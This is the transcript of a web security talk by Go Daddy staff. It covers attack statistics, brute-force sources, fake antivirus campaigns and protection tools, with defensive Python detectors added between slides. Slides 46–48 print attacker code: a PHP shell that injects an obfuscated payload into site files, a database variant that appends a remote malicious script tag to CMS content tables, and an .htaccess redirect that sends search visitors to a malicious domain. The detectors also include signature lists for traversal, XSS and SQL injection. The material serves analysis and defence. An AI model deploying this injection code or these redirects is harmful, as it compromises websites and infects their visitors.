Keeping up with the web application security
Transcript of Keeping up with the web application security
Page 1
KEEPING UP WITH THE WEB APPLICATION SECURITY
Ganesh Devarajan & Todd Redfoot
Page 2
Introduction
Todd Redfoot, Chief Information Security Officer
Ganesh Devarajan, Sr. Security Architect
Page 3
The Background
(What does Go Daddy do?)
Page 4
Page 5
What does Go Daddy do?
9.4 Million Customers
48 Million Domains Under Management
Over 5 million Active Hosting Accounts
1/3 of all DNS queries run through our servers
We register, renew or transfer more than one domain name every second
Page 6
What does Go Daddy do?
40+ Security Professionals in Team
24 x 7 Operations Center
Research
Engineering
Forensics
Customer Security Advisors
Penetration Testing
User Administration
Development
Page 7
Page 8
The Numbers
(What does Go Daddy see?)
Page 9
What do we see?
Monitor over 100,000 events per second (8.6 Billion/Day)
DDoS - ~900 Attacks per day / 6K per week
Feb 2011 - Largest attack @ 21M pps
Last Week – 40G Attack
Brute Force – 3.5M per hour
Page 10
What do we see?
“Other” Attacks:
425K – Invalid Directory Traversal
90K – XSS Prevention
115K – SQL Injection Prevention
… all in a 24 hour period…
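Counts like the three “Other” buckets above come from classifying each request against a set of signatures and then aggregating. The block below is an added example, not monitoring code from the talk: it runs a small classifier over constructed Apache access-log lines and counts hits per category and per source address. The log format, the signature patterns and the sample addresses are assumptions made for the example, not a production WAF ruleset.

```python
"""Classify web requests into directory traversal / XSS / SQL injection
buckets from Apache combined-format access log lines (example code)."""
import re
from collections import Counter
from urllib.parse import unquote

# Combined log format: ip - - [time] "METHOD path HTTP/x" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Category -> illustrative signature applied to the decoded, lower-cased path+query.
SIGNATURES = {
    "directory_traversal": re.compile(r"(\.\./|\.\.\\|/etc/passwd|boot\.ini)"),
    "xss": re.compile(r"(<script|javascript:|onerror\s*=|onload\s*=)"),
    "sql_injection": re.compile(
        r"('\s*(or|and)\s+\S+\s*=\s*\S+|union\s+select|sleep\(|information_schema|;\s*drop\s)"
    ),
}

def normalize(path):
    # Decode twice: double-encoded payloads slip past a single-pass filter.
    return unquote(unquote(path)).lower()

def classify(path):
    """Return the categories a request path matches (empty list if none)."""
    decoded = normalize(path)
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded)]

def summarize(lines):
    """Count events per category and per (category, source IP)."""
    per_category = Counter()
    per_source = Counter()
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        for cat in classify(m.group("path")):
            per_category[cat] += 1
            per_source[(cat, m.group("ip"))] += 1
    return per_category, per_source

# Constructed sample lines (not real traffic; documentation-range addresses).
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Oct/2011:13:55:36 -0700] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 403 512',
    '198.51.100.7 - - [10/Oct/2011:13:55:37 -0700] "GET /index.php?page=..%2F..%2Fboot.ini HTTP/1.1" 403 512',
    '203.0.113.9 - - [10/Oct/2011:13:56:01 -0700] "GET /search?q=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 403 512',
    '203.0.113.9 - - [10/Oct/2011:13:56:02 -0700] "GET /products.php?id=1%27%20OR%201%3D1-- HTTP/1.1" 403 512',
    '192.0.2.44 - - [10/Oct/2011:13:57:10 -0700] "GET /about.html HTTP/1.1" 200 2048',
    '192.0.2.44 - - [10/Oct/2011:13:57:11 -0700] "GET /news?id=5%20UNION%20SELECT%201,2,3 HTTP/1.1" 403 512',
]

if __name__ == "__main__":
    cats, sources = summarize(SAMPLE_LOG)
    for cat, n in sorted(cats.items()):
        print(f"{cat}: {n}")
    for (cat, ip), n in sorted(sources.items()):
        print(f"  {cat} from {ip}: {n}")
```

Per-source counts are what make the later "attempts by source" slides possible; a per-category count alone tells you how noisy the day was, not where it came from.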
Page 11
Current Trends
Page 12
SSH Brute Forcers
By source country: US 54%, CN 20%, KR 6%, BG 4%, AR 4%, TW 3%, FR 2%, JP 2%, CA 2%, BR 2%
Page 13
SSH Brute Forcers
Englewood, Colorado: 140 Million attempts
Page 14
MS-SQL Brute Forcers
By source country: US 65%, CN 24%, TR 5%, CA 2%, "-" 1%, KR 1%, TH 1%, RU 0%, VN 0%, IE 0%
Page 15
MS-SQL Brute Forcers
Orlando, FL: 348 Million attempts
Page 16
My-SQL Brute Forcers
By source country: US 78%, CN 12%, CA 4%, SE 2%, FR 2%, MY 1%, PH 1%, IN 0%, JP 0%, KR 0%
Page 17
My-SQL Brute Forcers
Page 18
FTP Brute Forcers
By source country: CN 66%, US 26%, HK 2%, CA 2%, IE 2%, TW 1%, KR 1%, RS 0%, DE 0%, BR 0%
Page 19
FTP Brute Forcers
XingPing, CN: 12 Million attempts
Page 20
Brute Forcers - All
By source country: US 61%, CN 27%, TR 4%, KR 2%, CA 2%, "-" 1%, BG 1%, TH 1%, AR 1%, TW 1%
Page 21
Brute Forcers - US
Garden City, NY: 75.7 Million attempts
Page 22
Brute Forcers - CN
Datong, CN: 22.5 Million attempts
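The per-source attempt counts on the brute-forcer slides are the result of aggregating failed logins by source address. The block below is an added example and not Go Daddy's monitoring code: it parses constructed sshd auth-log lines and flags sources that exceed a number of failures inside a sliding time window, reporting the total failures and the number of distinct usernames tried. The threshold, the window and the sample addresses are assumptions.

```python
"""Per-source SSH brute-force detection over sshd auth log lines (example)."""
import re
from collections import defaultdict
from datetime import datetime

# Matches the standard OpenSSH failure line, with or without "invalid user".
AUTH_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)

def parse_failures(lines, year=2011):
    """Yield (timestamp, user, source_ip) for each failed-password line.
    syslog lines carry no year, so one is supplied by the caller."""
    for line in lines:
        m = AUTH_RE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m.group('ts')}", "%Y %b %d %H:%M:%S")
            yield ts, m.group("user"), m.group("ip")

def brute_force_sources(lines, threshold=5, window_seconds=60):
    """Return {ip: (total_failures, distinct_users)} for every source that
    produced at least `threshold` failures within some window of
    `window_seconds`. Sources that never reach the threshold are omitted."""
    by_ip = defaultdict(list)
    users = defaultdict(set)
    for ts, user, ip in parse_failures(lines):
        by_ip[ip].append(ts)
        users[ip].add(user)
    flagged = {}
    for ip, stamps in by_ip.items():
        stamps.sort()
        start = 0
        for end in range(len(stamps)):
            # advance the window start until the window fits the limit
            while (stamps[end] - stamps[start]).total_seconds() > window_seconds:
                start += 1
            if end - start + 1 >= threshold:
                flagged[ip] = (len(stamps), len(users[ip]))
                break
    return flagged

# Constructed sample log (documentation-range addresses, not real traffic).
SAMPLE_AUTH_LOG = [
    "Oct 12 13:55:01 web1 sshd[4021]: Failed password for root from 198.51.100.23 port 51234 ssh2",
    "Oct 12 13:55:02 web1 sshd[4023]: Failed password for invalid user admin from 198.51.100.23 port 51240 ssh2",
    "Oct 12 13:55:03 web1 sshd[4025]: Failed password for invalid user oracle from 198.51.100.23 port 51244 ssh2",
    "Oct 12 13:55:04 web1 sshd[4027]: Failed password for root from 198.51.100.23 port 51250 ssh2",
    "Oct 12 13:55:05 web1 sshd[4029]: Failed password for invalid user test from 198.51.100.23 port 51255 ssh2",
    "Oct 12 13:55:06 web1 sshd[4031]: Failed password for root from 198.51.100.23 port 51260 ssh2",
    "Oct 12 13:10:00 web1 sshd[3999]: Failed password for alice from 192.0.2.8 port 40000 ssh2",
    "Oct 12 13:40:00 web1 sshd[4010]: Failed password for alice from 192.0.2.8 port 40001 ssh2",
    "Oct 12 13:40:03 web1 sshd[4012]: Accepted password for alice from 192.0.2.8 port 40001 ssh2",
]

if __name__ == "__main__":
    for ip, (failures, distinct) in brute_force_sources(SAMPLE_AUTH_LOG).items():
        print(f"{ip}: {failures} failures, {distinct} usernames tried")
```

The distinct-username count separates a user mistyping a password (one name, a few failures spread over time) from a scanner walking a wordlist (many names, failures a second apart), which matters before feeding a source into any automatic block list.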
Page 23
Brute Forcinator
Page 24
SQL Injection
By source country: US 41%, CN 28%, BG 9%, UK 5%, ID 4%, NL 4%, CZ 3%, JP 3%, AU 2%, FR 2%
Page 25
SQL Injection
Seattle, WA: 1.3 Million attempts
Page 26
Backdoor Shells
By source country: US 87%, ID 4%, NG 2%, UK 2%, CN 1%, CA 1%, DE 1%, BR 1%, NL 1%, AL 0%
Page 27
Backdoor Shells
Phone Company (91%), Mountain View, CA
Page 28
PHP Attacks
By source country: US 65%, KR 8%, FR 6%, RU 4%, DE 3%, LU 3%, UK 3%, BR 3%, CA 2%, NL 2%
Page 29
PHP Attacks
Berlin, Germany: 1.9 Million attempts
Page 30
PHP Attacks
Montreal, CA: 1.1 Million attempts
Page 31
Botnet
By source country: US 52%, UK 7%, KR 6%, PL 6%, FR 6%, DE 6%, CA 6%, RU 5%, NL 4%, AU 3%
Page 32
Botnet
Page 33
Botnet
Source - https://zeustracker.abuse.ch/
Page 34
Botnet
Source - http://www.shadowserver.org/wiki/pmwiki.php/Stats/DroneMaps
Page 35
Phishing
Page 36
The Good, Bad and Ugly?
Page 37
The Bad – Most Events
Page 38
The Ugly – Security Events & DDoS
Page 39
New Trends
Page 40
Recent Changes
“Hacktivists”: Lulzsec = Twitter, ComodoHacker = Pastebin
Phishing -> Spear Phishing
Targeted & Coordinated Attacks
RSA / Lockheed Martin Connection
Page 41
What’s in the News?
Page 42
More Client-side Exploits
Browser exploits
Adobe exploits
Web Server Compromises
Brute Force Attacks
Leveraging Web Application Vulnerabilities
Config files with passwords
More of the same…
Page 43
Fake AV
Scareware
Reports fake viruses to users
Asks for fee to remove the threat
Paying does nothing but give them your CC#
$10 Million in Revenue last year
Page 44
Fake AV Analysis
Page 45
Fake AV – Attack Breakdown
(diagram; labels listed in the order the attack flows)
Fake AV Basterds
FTP/SSH Upload of Attack Shell/Script
Servers with Compromised Accounts (Zeus/Phishing/etc)
Compromised Attack Server(s)
Make HTTP calls to infection script and site is infected
<script>http://intermediary.com/ll.php</script>
Disposable Domain Name
Registrant: Hilary Kneber [email protected] fax: 756946829/2 Sun street. Montey 29 Virginia NA 3947
Casual Web User Visits Infected Site
End Users
GET http://intermediary.com/ll.php
<html>Holy Crap! Infected! Click Here to clean</html>
$$$$$$
Page 46
Fake AV – Sample Shell

```php
// The base64 payload and the body of do_folder() are not shown on the slide.
$z=$_SERVER["DOCUMENT_ROOT"];                                 // start at the web root
$encoded='<'.'?php /**/ [base64 encoded string]"));?'.'>';   // obfuscated payload to inject
@unlink($_SERVER['SCRIPT_FILENAME']);                         // deletes its own file on first run
$val=$z;
$totalinjected=0;
echo "Working with $val\n!!STARTING!!";
ob_flush();
$start_time=microtime(true);
if ($val!="") do_folder($val);                                // walks the tree, injecting into files
$end_time=microtime(true)-$start_time;
echo "|Injected| $totalinjected files in $end_time seconds\n";
```
Page 47
Fake AV – DB Variant

```php
// …
$insert='<script src="http://welcometotheglobalisorg.com/js.php?kk=26"></script>';
// ...
$link=mysql_connect($host,$user,$pass);
if (!$link) {
    die('Could not connect: ' . mysql_error());
}else{
    echo 'Connected successfully'."\n";
    // enumerate every database the stolen credentials can reach
    $db_list = mysql_list_dbs($link);
    $bases = array();
    while ($row = mysql_fetch_object($db_list)) {
        $bases[]=$row->Database;
    }
// …
// for each table whose name matches a known CMS content table, append the
// remote script tag to every content row
//wordpress
if (last_is($table,"_posts")){ $query="UPDATE `".$bases[$i]."`.`$table` SET `post_content` = concat(`post_content`,'$insert')"; }
//joomla
if (last_is($table,"_content")){ $query="UPDATE `".$bases[$i]."`.`$table` SET `introtext` = concat(`introtext`,'$insert')"; }
//drupal
if (last_is($table,"node_revisions")){ $query="UPDATE `".$bases[$i]."`.`$table` SET `body` = concat(`body`,'$insert'), format=2"; }
if (last_is($table,"_post")){ $query="UPDATE `".$bases[$i]."`.`$table` SET `title` = concat(`title`,'$insert')"; }
```
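The file-walking shell on the Sample Shell slide and the DB variant above leave the same artifact behind: a `<script src=...>` tag pointing at a host the site does not own, appended to page content (in files in the first case, in CMS content rows in the second). The block below is an added example and not code from the talk: it finds and strips such tags in constructed rows modelled on the tables the DB variant targets. The allow-list of the site's own hosts and the sample rows are assumptions; the same `external_scripts` check works on the text of a file pulled from the document root.

```python
"""Find and strip remote script tags that point outside an allow-list (example)."""
import re
from urllib.parse import urlparse

# src attribute of any <script> tag, quoted or not
SCRIPT_SRC_RE = re.compile(r"<script[^>]*\ssrc\s*=\s*['\"]?([^'\"\s>]+)", re.IGNORECASE)
# whole <script ...>...</script> element, for removal
SCRIPT_TAG_RE = re.compile(r"<script\b[^>]*>.*?</script>", re.IGNORECASE | re.DOTALL)

def external_scripts(html, allowed_hosts):
    """Return script src URLs whose host is not in allowed_hosts.
    Relative srcs (no host) are treated as local and ignored."""
    found = []
    for src in SCRIPT_SRC_RE.findall(html):
        host = urlparse(src).hostname
        if host and host.lower() not in allowed_hosts:
            found.append(src)
    return found

def scan_rows(rows, allowed_hosts, fields=("post_content", "introtext", "body", "title")):
    """rows: dicts shaped like the CMS tables the shell targets
    (wp *_posts, joomla *_content, drupal node_revisions).
    Returns [(table, id, field, src)] for every injected tag."""
    hits = []
    for row in rows:
        for field in fields:
            value = row.get(field)
            if isinstance(value, str):
                for src in external_scripts(value, allowed_hosts):
                    hits.append((row["table"], row["id"], field, src))
    return hits

def strip_external_scripts(html, allowed_hosts):
    """Remove <script> elements whose src is external; leave everything else."""
    def keep_or_drop(m):
        return "" if external_scripts(m.group(0), allowed_hosts) else m.group(0)
    return SCRIPT_TAG_RE.sub(keep_or_drop, html)

# Constructed sample rows; the injected tag is the one shown on the slide.
INJECT = '<script src="http://welcometotheglobalisorg.com/js.php?kk=26"></script>'
SAMPLE_ROWS = [
    {"table": "wp_posts", "id": 1, "post_content": "<p>Hello world</p>" + INJECT},
    {"table": "wp_posts", "id": 2, "post_content": '<p>Clean</p><script src="/wp-includes/js/jquery.js"></script>'},
    {"table": "jos_content", "id": 7, "introtext": "<p>Welcome</p>" + INJECT},
    {"table": "node_revisions", "id": 3, "body": '<script src="https://cdn.example-site.test/app.js"></script>Intro'},
]
ALLOWED = {"www.example-site.test", "cdn.example-site.test"}  # assumed site hosts

if __name__ == "__main__":
    for table, row_id, field, src in scan_rows(SAMPLE_ROWS, ALLOWED):
        print(f"{table}#{row_id}.{field}: injected {src}")
```

Running the scan before the cleanup, and keeping the hit list, preserves the evidence (which tables, which rows, which remote host) that the incident write-up and any takedown request will need; `strip_external_scripts` is the cleanup step, to be applied only once the allow-list has been confirmed against the site's real dependencies.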
Page 48
Fake AV - Search Redirect

```apache
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
RewriteRule .* http://sokoloperkovuskeci.com/in.php?g=945 [R,L]
</IfModule>
```

```apache
addhandler x-httpd-php-cgi .php4
addhandler x-httpd-php5-cgi .php5
addhandler x-httpd-php5-cgi .php
```
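The .htaccess above combines two things worth flagging on any shared host: a redirect that fires only when the referrer is a search engine (so the site owner, who types the URL directly, never sees it) and AddHandler lines that change how .php files are executed. The block below is an added example, not a tool from the talk: it audits .htaccess text for exactly those two patterns. The sample file content reproduces the slide's rules; the benign control file, the site's own host list and the search-engine name list are assumptions.

```python
"""Audit .htaccess text for search-referrer redirects and PHP handler remaps (example)."""
import re
from urllib.parse import urlparse

# search-engine names taken from the RewriteCond lines on the slide
SEARCH_ENGINES = ("google", "bing", "yahoo", "msn", "aol", "ask.com", "live.com", "altavista", "excite")
PHP_EXTENSIONS = {".php", ".php4", ".php5"}

def parse_htaccess(text):
    """Yield (directive, args) for each non-comment line, in file order."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        yield parts[0].lower(), (parts[1] if len(parts) > 1 else "")

def audit_htaccess(text, site_hosts):
    """Return a list of findings:
    ("search_referrer_redirect", target_url, number_of_referrer_conditions)
    ("php_handler_remap", handler, extensions)"""
    findings = []
    referer_conds = 0  # RewriteCond lines on HTTP_REFERER since the last RewriteRule
    for directive, args in parse_htaccess(text):
        tokens = args.split()
        if directive == "rewritecond":
            if "%{HTTP_REFERER}" in args.upper() and any(s in args.lower() for s in SEARCH_ENGINES):
                referer_conds += 1
        elif directive == "rewriterule":
            target = tokens[1] if len(tokens) > 1 else ""
            host = urlparse(target).hostname
            # redirect to a host the site does not own, gated on a search-engine referrer
            if referer_conds and host and host.lower() not in site_hosts:
                findings.append(("search_referrer_redirect", target, referer_conds))
            referer_conds = 0  # a RewriteRule consumes the preceding conditions
        elif directive == "addhandler" and tokens:
            handler, exts = tokens[0], tuple(e.lower() for e in tokens[1:])
            if PHP_EXTENSIONS & set(exts):
                findings.append(("php_handler_remap", handler, exts))
        # other directives (RewriteEngine, RewriteOptions, IfModule wrappers) are ignored
    return findings

# The rules from the slide, as constructed file content.
SUSPICIOUS_HTACCESS = """\
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
RewriteRule .* http://sokoloperkovuskeci.com/in.php?g=945 [R,L]
</IfModule>
addhandler x-httpd-php-cgi .php4
addhandler x-httpd-php5-cgi .php5
addhandler x-httpd-php5-cgi .php
"""

# A constructed benign control: plain HTTP-to-HTTPS redirect to the site's own host.
BENIGN_HTACCESS = """\
RewriteEngine On
RewriteCond %{HTTPS} off
RewriteRule ^(.*)$ https://www.example-site.test/$1 [R=301,L]
"""

if __name__ == "__main__":
    for finding in audit_htaccess(SUSPICIOUS_HTACCESS, {"www.example-site.test"}):
        print(finding)
```

Handler remaps are reported for review rather than as definite compromise, since hosting panels legitimately set PHP handlers; the referrer-gated redirect to a host outside the site's own list is the stronger signal, and it is the reason a site owner checking from a bookmark sees nothing wrong while search visitors are sent elsewhere.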
Page 49
Custom Monitoring
Page 50
UDP Flooder
Page 51
How to Protect?
Page 52
Website Vulnerability Scanners
Website Protection - Site Scanner ($48/Year)
Beyond Security ($99.95/Year)
McAfee Secure™ (~$2100/Year)
WhiteHat Security®
IBM AppScan®
Cenzic®
HP WebInspect®
Page 53
Web Based Malware Detection
Virtual machine honey pots: monitor creation of new processes, file system or registry entries, etc.
Browser emulation
Reputation service: Internet’s black list
Signature based detection/prevention: Intrusion Detection System/Intrusion Prevention System, Anti-Virus
Page 54
New Methodologies
Page 55
Questions?